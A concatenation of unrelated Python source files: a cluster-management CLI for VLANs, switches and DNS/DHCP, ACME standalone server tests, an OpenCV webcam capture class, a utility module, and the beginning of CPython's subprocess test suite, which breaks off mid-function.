#if len(args) > 0:
#data.removeVlan(args[0])
#else:
#mesg = "USAGE: %s --removeVlan VlanNumber\n" % (sys.argv[0])
#sys.stdout.write(mesg)
#exit()
if (options.assignVlan):
print len(args)
if len(args) > 0:
data.assignVlan(options.assignVlan, args[0], options.forcefully)
else:
mesg = "USAGE: %s --assignVlan vlannum DomainName\n" % (sys.argv[0])
sys.stdout.write(mesg)
exit()
# Admin Interface
# snmpwalk -v2c -c zoni-domain sw0-r1r1 .1.3.6.1.2.1.17.7.1.4.3.1.5
if (options.ADMIN):
if not options.nodeName and not options.createVlanId and not options.destroyVlanId and not options.switchPort and not options.interactiveSwitchConfig and not options.saveConfig:
mesg = "\nERROR: nodeName or switch not specified. Please specify nodename with -n or --nodeName or --switchport\n"
parser.print_help()
sys.stderr.write(mesg)
exit()
# We can specify port/switch combinations here
if options.switchPort:
host = data.getSwitchInfo(options.switchPort.split(":")[0])
if len(options.switchPort.split(":")) > 1:
host['hw_port'] = options.switchPort.split(":")[1]
host['location'] = options.switchPort
if options.interactiveSwitchConfig:
host = data.getSwitchInfo(options.interactiveSwitchConfig)
HwSwitch = HwDellSwitch
hwswitch = HwSwitch(configs, host)
if options.verbosity:
hwswitch.setVerbose(True)
if options.setPortMode:
hwswitch.setPortMode(options.setPortMode)
if options.saveConfig:
hwswitch.saveConfig(options.saveConfig, data)
if options.labelPort:
mydesc = None
if len(args) > 0:
mydesc = " ".join(["%s" % i for i in args])
hwswitch.labelPort(mydesc)
if options.enableHostPort and (options.nodeName or options.switchPort):
hwswitch.enableHostPort()
if options.disableHostPort and (options.nodeName or options.switchPort):
hwswitch.disableHostPort()
# Create a new vlan on all switches and add to db
if options.createVlanId:
print options.createVlanId
hwswitch.createVlans(options.createVlanId, data.getAllSwitches(), data)
data.addVlan(options.createVlanId, string.join(args[1:len(args)]))
# Remove vlan on all switches and remove from db
if options.destroyVlanId:
hwswitch.removeVlans(options.destroyVlanId, data.getAllSwitches(), data)
data.removeVlan(options.destroyVlanId)
if options.add2Vlan and (options.nodeName or options.switchPort):
tag="untagged"
vlan = options.add2Vlan
if ":" in options.add2Vlan:
print options.add2Vlan
vlan = options.add2Vlan.split(":")[0]
tag = options.add2Vlan.split(":")[1]
hwswitch.addNodeToVlan(vlan, tag)
data.addNodeToVlan(host['location'], vlan, tag)
exit()
if options.removeFromVlan and (options.nodeName or options.switchPort):
hwswitch.removeNodeFromVlan(options.removeFromVlan)
data.removeNodeFromVlan(options.nodeName, options.removeFromVlan)
if options.setNative and (options.nodeName or options.switchPort):
hwswitch.setNativeVlan(options.setNative)
data.addNodeToVlan(host['location'], options.setNative, "native")
if options.restoreNative and options.nodeName:
hwswitch.restoreNativeVlan()
if options.removeAllVlans and (options.nodeName or options.switchPort):
hwswitch.removeAllVlans()
if options.sendSwitchCommand and (options.nodeName or options.switchPort):
hwswitch.sendSwitchCommand(options.sendSwitchCommand)
if options.interactiveSwitchConfig:
hwswitch.interactiveSwitchConfig()
if options.showSwitchConfig and (options.nodeName or options.switchPort):
hwswitch.showInterfaceConfig()
# Register hardware
if options.register:
supported_hardware = ['dellswitch', 'raritan']
if len(args) < 3:
mesg = "ERROR: Expecting username and ip address of hardware to be registered\n"
mesg += os.path.basename(sys.argv[0]) + " --register HARDWARE username ipaddr\n"
mesg += "Supported hardware " + str(supported_hardware) + "\n"
sys.stderr.write(mesg)
else:
if string.lower(args[0]) == "dellswitch":
HwSwitch = HwDellSwitch
hw = HwSwitch(configs)
elif string.lower(args[0]) == "raritan":
hw = raritanDominionPx(configs)
else:
mesg = "Undefined hardware type\nSupported Hardware" + str(supported_hardware) + "\n"
sys.stderr.write(mesg)
exit()
if options.verbosity:
hw.setVerbose(True)
print args
password = getpass.getpass()
data = hw.registerToZoni(args[1], password, args[2])
# Register to DB
#data.registerHardware(data)
# Zoni Helper
if options.addDns or options.removeDns or options.addDhcp or options.removeDhcp or options.addCname or options.removeCname:
if options.addDns:
thisone = "--addDns"
if options.removeDns:
thisone = "--removeDns"
if options.removeDhcp:
thisone = "--removeDhcp"
if options.addDhcp:
thisone = "--addDhcp"
if options.addCname:
thisone = "--addCname"
if options.removeCname:
thisone = "--removeCname"
if options.addDns:
if len(args) < 2:
mesg = "ERROR: Incorrect number of arguments\n"
mesg += "Example: " + os.path.basename(sys.argv[0]) + " " + thisone + " hostname IP_Address\n"
print mesg
exit()
hostName = args[0]
ip = args[1]
if validIp(ip):
mesg = "Adding DNS entry: %s (%s) " % (hostName, ip)
sys.stdout.write(mesg)
dhcpdns = DhcpDns(configs, verbose=options.verbosity)
dhcpdns.addDns(hostName, ip)
try:
socket.gethostbyname(hostName)
sys.stdout.write("[Success]\n")
except Exception:
sys.stdout.write("[Fail]\n")
else:
mesg = "ERROR: Malformed IP Address\n"
mesg += "Use the dotted quad notation, e.g. 10.0.0.10\n"
print mesg
exit()
if options.removeDns or options.removeDhcp or options.removeCname:
if len(args) < 1:
mesg = "ERROR: Incorrect number of arguments\n"
mesg += "Example: " + os.path.basename(sys.argv[0]) + " " + thisone + " hostname\n"
sys.stdout.write(mesg)
exit()
hostName = args[0]
dhcpdns = DhcpDns(configs, verbose=options.verbosity)
if options.removeDns:
mesg = "Removing DNS entry: %s " % (hostName)
sys.stdout.write(mesg)
dhcpdns.removeDns(hostName)
try:
socket.gethostbyname(hostName)
sys.stdout.write("[Fail]\n")
except Exception:
sys.stdout.write("[Success]\n")
if options.removeDhcp:
dhcpdns.removeDhcp(hostName)
if options.removeCname:
mesg = "Removing DNS CNAME entry: %s " % (hostName)
sys.stdout.write(mesg)
dhcpdns.removeCname(hostName)
if dhcpdns.error:
mesg = "[FAIL] " + str(dhcpdns.error) + "\n"
sys.stdout.write(mesg)
else:
mesg = "[SUCCESS]" + "\n"
sys.stdout.write(mesg)
if options.addDhcp:
if len(args) < 3:
mesg = "ERROR: Incorrect number of arguments\n"
mesg += "Example: " + os.path.basename(sys.argv[0]) + " " + thisone + " hostname IP_Address Mac_Address\n"
print mesg
exit()
hostName = args[0]
ip = args[1]
mac = args[2]
if validIp(ip) and validMac(mac):
dhcpdns = DhcpDns(configs, verbose=options.verbosity)
dhcpdns.addDhcp(hostName, ip, mac)
if dhcpdns.error:
mesg = "ERROR: Add DHCP Error " + dhcpdns.error + "\n"
else:
if not validIp(ip):
mesg = "ERROR: Malformed IP Address\n"
mesg += "Use the dotted quad notation, e.g. 10.0.0.10\n"
print mesg
exit()
if not validMac(mac):
mesg = "ERROR: Malformed MAC Address\n"
mesg += "Example 10:20:30:40:50:60\n"
print mesg
exit()
if options.addCname:
if len(args) < 2:
mesg = "ERROR: Incorrect number of arguments\n"
mesg += "Example: %s %s cname existing_name" % (os.path.basename(sys.argv[0]), thisone)
print mesg
exit()
hostName = args[1]
cname = args[0]
mesg = "Adding DNS CNAME entry: %s -> %s " % (cname, hostName)
sys.stdout.write(mesg)
dhcpdns = DhcpDns(configs, verbose=options.verbosity)
dhcpdns.addCname(cname, hostName)
if dhcpdns.error:
mesg = "[FAIL] \n %s\n" % str(dhcpdns.error)
sys.stdout.write(mesg)
else:
mesg = "[SUCCESS]\n"
sys.stdout.write(mesg)
## Extensions from MIMOS - functions are defined in m_extensions.py
if ( options.addRole and options.nodeName ) or ( options.removeRole and options.nodeName ):
if options.addRole:
mimos.assignRoletoHost(host,options.addRole)
mimos.addRoletoNode(configs,host,options.nodeName,options.addRole)
if options.removeRole:
mimos.unassignRolefromHost(host)
mimos.removeRolefromNode(configs,host,options.nodeName)
if ( options.addRole and not options.nodeName ) or ( options.removeRole and not options.nodeName ):
mesg = "Roles: Missing Parameter(s)!"
logging.error(mesg)
if options.showRoleMap:
mimos.showRoletoHost(configs)
if options.showKernelInfo:
mimos.showKernelInfo()
if options.showInitrdInfo:
mimos.showInitrdInfo()
if options.registerKernelInitrd:
mimos.registerKernelInitrd(configs,options.registerKernelInitrd)
if options.getKernelInitrdID:
mimos.getKernelInitrdID(options.getKernelInitrdID)
if options.getConfig:
mimos.getConfig(configs,options.getConfig)
if __name__ == "__main__":
main()
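# Illustrative invocations, inferred from the option definitions and usage
# strings above (node and host names follow the examples used in those usage
# strings and are not real entries):
#   zoni-cli.py -n r1r1u25 --hw ipmi --powerStatus
#   zoni-cli.py -I
#   zoni-cli.py --addDns myhost01 10.0.0.10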
|
standalone_test.py
|
"""Tests for acme.standalone."""
import socket
import threading
import unittest
from unittest import mock
import josepy as jose
import requests
from six.moves import http_client # pylint: disable=import-error
from six.moves import socketserver # type: ignore # pylint: disable=import-error
from acme import challenges
from acme import crypto_util
from acme import errors
import test_util
class TLSServerTest(unittest.TestCase):
"""Tests for acme.standalone.TLSServer."""
def test_bind(self): # pylint: disable=no-self-use
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True)
server.server_close()
def test_ipv6(self):
if socket.has_ipv6:
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True, ipv6=True)
server.server_close()
class HTTP01ServerTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01Server."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01Server
self.server = HTTP01Server(('', 0), resources=self.resources)
self.port = self.server.socket.getsockname()[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown()
self.thread.join()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
def test_timely_shutdown(self):
from acme.standalone import HTTP01Server
server = HTTP01Server(('', 0), resources=set(), timeout=0.05)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
client = socket.socket()
client.connect(('localhost', server.socket.getsockname()[1]))
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
server_thread.join(5.)
is_hung = server_thread.is_alive()
try:
client.shutdown(socket.SHUT_RDWR)
except: # pragma: no cover, pylint: disable=bare-except
# may raise error because socket could already be closed
pass
self.assertFalse(is_hung, msg='Server shutdown should not be hung')
@unittest.skipIf(not challenges.TLSALPN01.is_supported(), "pyOpenSSL too old")
class TLSALPN01ServerTest(unittest.TestCase):
"""Test for acme.standalone.TLSALPN01Server."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
# Use different certificate for challenge.
self.challenge_certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa4096_key.pem'),
test_util.load_cert('rsa4096_cert.pem'),
)}
from acme.standalone import TLSALPN01Server
self.server = TLSALPN01Server(("localhost", 0), certs=self.certs,
challenge_certs=self.challenge_certs)
# pylint: disable=no-member
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown() # pylint: disable=no-member
self.thread.join()
# TODO: This is not implemented yet, see comments in standalone.py
# def test_certs(self):
# host, port = self.server.socket.getsockname()[:2]
# cert = crypto_util.probe_sni(
# b'localhost', host=host, port=port, timeout=1)
# # Expect normal cert when connecting without ALPN.
# self.assertEqual(jose.ComparableX509(cert),
# jose.ComparableX509(self.certs[b'localhost'][1]))
def test_challenge_certs(self):
host, port = self.server.socket.getsockname()[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1,
alpn_protocols=[b"acme-tls/1"])
# Expect challenge cert when connecting with ALPN.
self.assertEqual(
jose.ComparableX509(cert),
jose.ComparableX509(self.challenge_certs[b'localhost'][1])
)
def test_bad_alpn(self):
host, port = self.server.socket.getsockname()[:2]
with self.assertRaises(errors.Error):
crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1,
alpn_protocols=[b"bad-alpn"])
class BaseDualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.BaseDualNetworkedServers."""
class SingleProtocolServer(socketserver.TCPServer):
"""Server that only serves on a single protocol. FreeBSD has this behavior for AF_INET6."""
def __init__(self, *args, **kwargs):
ipv6 = kwargs.pop("ipv6", False)
if ipv6:
self.address_family = socket.AF_INET6
kwargs["bind_and_activate"] = False
else:
self.address_family = socket.AF_INET
socketserver.TCPServer.__init__(self, *args, **kwargs)
if ipv6:
# NB: On Windows, socket.IPPROTO_IPV6 constant may be missing.
# We use the corresponding value (41) instead.
level = getattr(socket, "IPPROTO_IPV6", 41)
self.socket.setsockopt(level, socket.IPV6_V6ONLY, 1)
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
@mock.patch("socket.socket.bind")
def test_fail_to_bind(self, mock_bind):
mock_bind.side_effect = socket.error
from acme.standalone import BaseDualNetworkedServers
self.assertRaises(socket.error, BaseDualNetworkedServers,
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
def test_ports_equal(self):
from acme.standalone import BaseDualNetworkedServers
servers = BaseDualNetworkedServers(
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
socknames = servers.getsocknames()
prev_port = None
# assert ports are equal
for sockname in socknames:
port = sockname[1]
if prev_port:
self.assertEqual(prev_port, port)
prev_port = port
class HTTP01DualNetworkedServersTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01DualNetworkedServers."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01DualNetworkedServers
self.servers = HTTP01DualNetworkedServers(('', 0), resources=self.resources)
self.port = self.servers.getsocknames()[0][1]
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
webcam.py
|
"""Raspberry Pi Face Recognition Treasure Box
Webcam OpenCV Camera Capture Device
Copyright 2013 Tony DiCola
Webcam device capture class using OpenCV. This class allows you to capture a
single image from the webcam, as if it were a snapshot camera.
This isn't used by the treasure box code out of the box, but is useful to have
if running the code on a PC where only a webcam is available. The interface is
the same as the picam.py capture class so it can be used in the box.py code
without any changes.
"""
import threading
import time
import cv2
# Rate at which the webcam will be polled for new images.
CAPTURE_HZ = 30.0
class OpenCVCapture(object):
def __init__(self, device_id=0):
"""Create an OpenCV capture object associated with the provided webcam
device ID.
"""
# Open the camera.
self._camera = cv2.VideoCapture(device_id)
if not self._camera.isOpened():
self._camera.open(device_id)
# Start a thread to continuously capture frames. This must be
# done because different layers of buffering in the webcam and
# OS drivers will cause you to retrieve old frames if they
# aren't continuously read.
self._capture_frame = None
# Use a lock to prevent concurrent access to the camera.
self._capture_lock = threading.Lock()
self._capture_thread = threading.Thread(target=self._grab_frames)
self._capture_thread.daemon = True
self._capture_thread.start()
def _grab_frames(self):
while True:
retval, frame = self._camera.read()
with self._capture_lock:
self._capture_frame = None
if retval:
self._capture_frame = frame
time.sleep(1.0 / CAPTURE_HZ)
def read(self):
"""Read a single frame from the camera and return the data as an
OpenCV image (which is a numpy array).
"""
frame = None
with self._capture_lock:
frame = self._capture_frame
# If there are problems, keep retrying until an image can be read.
while frame is None:
time.sleep(0)
with self._capture_lock:
frame = self._capture_frame
# Return the captured image data.
return frame
def stop(self):
print("Terminating...")
|
utilit.py
|
# -*- coding: utf-8 -*-
__author__ = 'Akinava'
__author_email__ = 'akinava@gmail.com'
__copyright__ = 'Copyright © 2019'
__license__ = 'MIT License'
__version__ = [0, 0]
import json
import sys
from datetime import datetime
from time import time
import threading
import logging
import settings
import get_args
class Singleton(object):
def __new__(cls, *args, **kwargs):
if not hasattr(cls, '_instance'):
cls._instance = super(Singleton, cls).__new__(cls)
if hasattr(cls, '_initialized'):
cls.__init__ = cls.__skip_init__
if not hasattr(cls, '_initialized'):
cls._initialized = True
return cls._instance
def __skip_init__(self, *args, **kwargs):
return
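# Illustrative use of Singleton (not part of the original module): a subclass
# gets exactly one instance, and its __init__ body only runs on the first call;
# later calls go through __skip_init__ and return the cached instance.
#
#     class Config(Singleton):
#         def __init__(self):
#             self.loaded = True
#
#     assert Config() is Config()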
class Stream:
def run_stream(self, target, **kwargs):
t = threading.Thread(target=target, kwargs=kwargs, daemon=True)
t.start()
def setup_logger():
settings.logger = logging.getLogger(__name__)
settings.logger.setLevel(settings.logging_level)
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(settings.logging_format)
handler.setFormatter(formatter)
settings.logger.addHandler(handler)
def update_obj(src, dst):
if isinstance(src, dict) and isinstance(dst, dict):
return update_dict(src, dst)
if isinstance(src, list) and isinstance(dst, list):
return update_list(src, dst)
return src
def debug_obj(obj):
if isinstance(obj, bytes):
return obj.hex()
if isinstance(obj, list):
return [debug_obj(item) for item in obj]
if isinstance(obj, dict):
return {k: debug_obj(v) for k, v in obj.items()}
return obj
def update_dict(src, dst):
for key, val in src.items():
dst[key] = update_obj(val, dst.get(key))
return dst
def update_list(src, dst):
return dst + src
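# Merge semantics of update_obj/update_dict/update_list above (illustrative):
# dicts are merged recursively, lists are concatenated as dst + src, and any
# other type from src simply replaces the dst value, e.g.
#   update_obj({'a': 1, 'b': [2]}, {'a': 0, 'b': [1], 'c': 3})
#   -> {'a': 1, 'b': [1, 2], 'c': 3}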
def now():
return datetime.now().strftime(settings.DATA_FORMAT)
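# check_border_with_over_flow below treats (min, max) as a circular range, so it
# also accepts values that wrap around the end of the numeric space, e.g.
# check_border_with_over_flow(250, 5, 252) and (250, 5, 3) are True while
# (250, 5, 100) is False. (Comment added for clarity; the wrap-around use case
# is inferred from the code itself, not from project documentation.)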
def check_border_with_over_flow(min, max, value):
if min < max:
return min < value < max
return value > min or max > value
def check_border_timestamp(timestamp):
return time() - settings.peer_ping_time_seconds < timestamp < time() + settings.peer_ping_time_seconds
def read_config_file():
with open(settings.config_file, 'r') as cfg_file:
return json.loads(cfg_file.read())
def import_config():
options, args = get_args.parser()
options_items = vars(options)
config = read_config_file()
for k, v in config.items():
if k in options_items and not getattr(options, k) is None:
continue
setattr(settings, k, v)
def import_options():
options, args = get_args.parser()
for key in vars(options):
value = getattr(options, key)
if value is None:
continue
setattr(settings, key, value)
def setup_settings():
setup_logger()
import_options()
import_config()
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
from test.support import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() so the child exits immediately; otherwise the
# test runner could hang whenever a working python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
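# Check that the executable argument accepts a bytes path.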
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
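# Check that the executable argument accepts a path-like object.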
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
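# Same as above, but with the executable given as a bytes path.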
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
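# Same as above, but with the executable given as a path-like object.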
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
